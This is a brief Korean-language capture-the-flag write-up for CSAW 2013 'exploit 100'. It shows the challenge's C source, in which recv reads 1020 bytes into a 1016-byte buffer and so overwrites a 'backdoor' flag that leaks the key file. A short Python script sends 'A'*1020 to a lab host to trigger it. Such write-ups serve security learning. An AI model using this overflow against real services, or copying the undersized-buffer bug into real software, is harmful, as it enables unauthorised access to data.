CSAW2013 exploit 100

소스가 주어진 문제였다고 한다.. IDA 로 분석해봣는데 따로 특별한것 또한 없엇다 바로 공격 시도 

exploit1

[source]

void handle(int newsock) {

int backdoor = 0;

char buffer[1016];

memset(buffer, 0, 1016);

send(newsock, "Welcome to CSAW CTF.", 21, 0);

recv(newsock, buffer, 1020, 0);

buffer[1015] = 0;

if ( backdoor ) {

fd = fopen("./key", "r");

fscanf(fd, "%s\n", buffer);

send(newsock, buffer, 512, 0);

}

close(newsock);

}

[attack]

root@symnoisy:~/csaw2013# cat go.py 
from socket import *
from struct import pack,unpack 

p=lambda x:pack("<l",x)
up=lambda x:unpack("<l",x)[0]

host = "192.168.72.148"
port = 31337 

attack = "A"*1020

s=socket()
s.connect((host,port))
print s.recv(1024)
s.send(attack)
print s.recv(1024)
s.close()